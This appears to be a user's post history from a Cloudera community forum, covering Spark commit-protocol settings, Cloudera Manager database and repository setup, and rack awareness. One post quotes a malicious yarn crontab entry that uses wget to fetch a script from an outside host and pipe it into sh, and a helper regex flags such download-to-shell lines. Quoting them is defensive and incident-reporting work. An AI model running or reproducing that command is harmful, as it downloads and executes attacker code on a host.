Member since 03-06-2020 | 114 Posts | 3 Kudos Received | 0 Solutions
07-26-2022
04:17 AM
Hi Team,

CDP uses the "org.apache.spark.internal.io.cloud.PathOutputCommitProtocol" commit protocol, which does not support dynamic partition overwrite (dynamicPartitionOverwrite). As a workaround, you can set the following parameters in your Spark job.

In code:
spark.conf.set("spark.sql.sources.partitionOverwriteMode", "dynamic")
spark.conf.set("spark.sql.parquet.output.committer.class", "org.apache.parquet.hadoop.ParquetOutputCommitter")
spark.conf.set("spark.sql.sources.commitProtocolClass", "org.apache.spark.sql.execution.datasources.SQLHadoopMapReduceCommitProtocol")

With spark-submit/spark-shell:
--conf spark.sql.sources.partitionOverwriteMode=dynamic \
--conf spark.sql.parquet.output.committer.class=org.apache.parquet.hadoop.ParquetOutputCommitter \
--conf spark.sql.sources.commitProtocolClass=org.apache.spark.sql.execution.datasources.SQLHadoopMapReduceCommitProtocol

Note: If you are using S3, you can disable the S3 committers by setting the spark.cloudera.s3_committers.enabled parameter to false:
--conf spark.cloudera.s3_committers.enabled=false
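If you launch jobs from a script, the same settings can be kept in one place. This is a minimal Python sketch, assuming you build the spark-submit command line yourself; build_conf_args and its on_s3 switch are hypothetical names, and the S3 committer flag is only added when you ask for it.

```python
import shlex

# Settings from the post: dynamic partition overwrite plus a commit protocol
# and Parquet committer to use instead of PathOutputCommitProtocol.
DYNAMIC_OVERWRITE_CONF = {
    "spark.sql.sources.partitionOverwriteMode": "dynamic",
    "spark.sql.parquet.output.committer.class":
        "org.apache.parquet.hadoop.ParquetOutputCommitter",
    "spark.sql.sources.commitProtocolClass":
        "org.apache.spark.sql.execution.datasources.SQLHadoopMapReduceCommitProtocol",
}


def build_conf_args(on_s3: bool = False) -> list[str]:
    """Return ["--conf", "key=value", ...] for the dynamic-overwrite workaround.

    Hypothetical helper: on_s3=True also disables the S3 committers.
    """
    conf = dict(DYNAMIC_OVERWRITE_CONF)
    if on_s3:
        conf["spark.cloudera.s3_committers.enabled"] = "false"
    args: list[str] = []
    for key, value in conf.items():
        args += ["--conf", f"{key}={value}"]
    return args


if __name__ == "__main__":
    # Print a copy-pasteable command line; "my_job.py" is a placeholder.
    print(shlex.join(["spark-submit", *build_conf_args(on_s3=True), "my_job.py"]))
```

Running it prints a single command line you can paste into a shell. In a PySpark session the equivalent is the three spark.conf.set calls listed in the post.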
03-08-2022
05:06 PM
In my case, the following cron entry was found:
$ sudo -u yarn crontab -l
*/10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh

It spawned a large number of spurious processes owned by yarn, driving up CPU usage. Nothing could be done. In some cases the number of entries was as high as 20k.

$ ps -ef | grep yarn
yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN
yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv
yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO
yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve
yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1
yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1
yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs
yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs
yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs
yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC
yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC
yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC
yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1
yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1
yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1
yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx
yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1
yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr

Thanks for discussing and bringing up this issue.
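To check other hosts for the same kind of entry, a crontab listing can be scanned for lines that download something and pipe it straight into a shell. This Python sketch is a heuristic built on that one assumption (wget or curl piped into sh or bash), not a complete malware detector; suspicious_cron_lines is a hypothetical helper.

```python
import re

# Heuristic (assumption): a download tool followed later on the same line by
# a pipe into sh or bash, as in the yarn crontab entry above.
PIPE_TO_SHELL = re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:ba)?sh\b")


def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return non-comment crontab lines that download and pipe into sh/bash."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        if PIPE_TO_SHELL.search(stripped):
            hits.append(stripped)
    return hits
```

For example, save the output of sudo -u yarn crontab -l and pass its text to suspicious_cron_lines; an entry like the one shown in the post would be returned.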
05-05-2021
06:09 AM
@klhinva The link provided by @ask_bill_brooks will show the current information. Here is an updated link directly to the Software Dependencies section. I hope this helps.
02-11-2021
01:04 AM
@Mondi Does that resolve your issue?
01-08-2021
07:37 AM
KT should be installed in its own cluster. From a security standpoint, you don't want other services on the box.
01-06-2021
12:22 AM
@Mondi That should not be an issue. You can add more nodes. Check the CM server logs to see what the issue is.
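A minimal Python sketch for narrowing down the CM server log, assuming the default location /var/log/cloudera-scm-server/cloudera-scm-server.log (adjust CM_SERVER_LOG if yours differs) and that problems show up as ERROR or WARN lines. Both helper names are hypothetical.

```python
from pathlib import Path
from typing import Iterable

# Assumption: default Cloudera Manager server log location.
CM_SERVER_LOG = Path("/var/log/cloudera-scm-server/cloudera-scm-server.log")


def filter_problem_lines(lines: Iterable[str], levels=("ERROR", "WARN"),
                         limit: int = 50) -> list[str]:
    """Keep the last `limit` lines that mention any of the given log levels."""
    matches = [line.rstrip("\n") for line in lines
               if any(level in line for level in levels)]
    return matches[-limit:] if limit > 0 else []


def recent_problems(log_path: Path = CM_SERVER_LOG, limit: int = 50) -> list[str]:
    """Read the log file and return its most recent ERROR/WARN lines."""
    with log_path.open(encoding="utf-8", errors="replace") as fh:
        return filter_problem_lines(fh, limit=limit)
```

Calling recent_problems() right after a failed add-host attempt should surface the relevant errors near the end of the list.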
01-04-2021
09:47 AM
@Mondi The simple answer is YES, and the best source is the vendor's own documentation (Rack awareness in CDP): computations are performed with the assistance of rack awareness scripts. Hope that helps.
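For context, a plain Hadoop topology script (the file named by net.topology.script.file.name) receives one or more host names or IP addresses as arguments and prints one rack path per argument. Cloudera Manager normally manages rack assignment for you, so treat this Python sketch as an illustration only: the rule of using each host's /24 subnet as its rack is an assumption, and anything that is not an IPv4 address falls back to /default-rack.

```python
#!/usr/bin/env python3
"""Hypothetical rack-awareness topology script (sketch).

Prints one rack path per command-line argument, in argument order.
"""
import ipaddress
import sys

DEFAULT_RACK = "/default-rack"


def rack_for(host: str) -> str:
    """Map an IPv4 address to a rack named after its /24 network (assumed layout)."""
    try:
        net = ipaddress.IPv4Network(f"{host}/24", strict=False)
    except ValueError:
        return DEFAULT_RACK  # host names, IPv6, or unparsable input
    return f"/{net.network_address}"


if __name__ == "__main__":
    for arg in sys.argv[1:]:
        print(rack_for(arg))
```

For example, running the script with 10.1.2.3 as its argument prints /10.1.2.0.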
12-20-2020
06:24 AM
@Mondi You can follow the doc below for reference. All you have to do is modify the db.properties file to point to the server that hosts the CM database. https://docs.cloudera.com/documentation/enterprise/latest/topics/cm_ig_mysql.html#cmig_topic_5_5
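As a sketch of that edit, assuming the file is /etc/cloudera-scm-server/db.properties and the database host is stored under com.cloudera.cmf.db.host (check the keys in your own file first), the Python helper below rewrites only that line and leaves credentials and other settings alone. set_db_host is a hypothetical name.

```python
import re

# Assumption: key used by Cloudera Manager for the database host.
HOST_KEY = "com.cloudera.cmf.db.host"


def set_db_host(properties_text: str, new_host: str) -> str:
    """Return properties_text with HOST_KEY pointed at new_host.

    Other lines are untouched; if the key is missing it is appended.
    """
    pattern = re.compile(rf"^([ \t]*{re.escape(HOST_KEY)}[ \t]*=).*$", re.MULTILINE)
    if pattern.search(properties_text):
        # A function replacement avoids escaping issues in new_host.
        return pattern.sub(lambda m: m.group(1) + new_host, properties_text)
    needs_newline = properties_text and not properties_text.endswith("\n")
    return f"{properties_text}{chr(10) if needs_newline else ''}{HOST_KEY}={new_host}\n"
```

You would then write the result back to db.properties and typically restart the Cloudera Manager server so it picks up the new connection.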
10-20-2020
07:00 AM
You'll need to create local package and parcel repositories. Docs here: https://docs.cloudera.com/cdp-private-cloud-base/7.1.3/installation/topics/cdpdc-local-package-parcel-repositories.html
Mike
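Once files are copied into the parcel repository directory, a quick sanity check can catch missing pieces before pointing Cloudera Manager at it. This Python sketch covers only the parcel side and assumes the repository holds manifest.json plus each *.parcel file with a checksum file next to it (.sha, .sha1 or .sha256, depending on the release); the helper names are hypothetical.

```python
from pathlib import Path
from typing import Iterable

# Assumption: checksum file suffixes seen in parcel repositories.
CHECKSUM_SUFFIXES = (".sha", ".sha1", ".sha256")


def check_parcel_listing(names: Iterable[str]) -> list[str]:
    """Return problems found in a list of repo file names; empty means it looks complete."""
    present = set(names)
    problems = []
    if "manifest.json" not in present:
        problems.append("missing manifest.json")
    for name in sorted(present):
        if name.endswith(".parcel") and not any(name + s in present for s in CHECKSUM_SUFFIXES):
            problems.append(f"no checksum file for {name}")
    return problems


def check_parcel_repo(repo_dir: Path) -> list[str]:
    """Run check_parcel_listing on the regular files in repo_dir."""
    return check_parcel_listing(p.name for p in repo_dir.iterdir() if p.is_file())
```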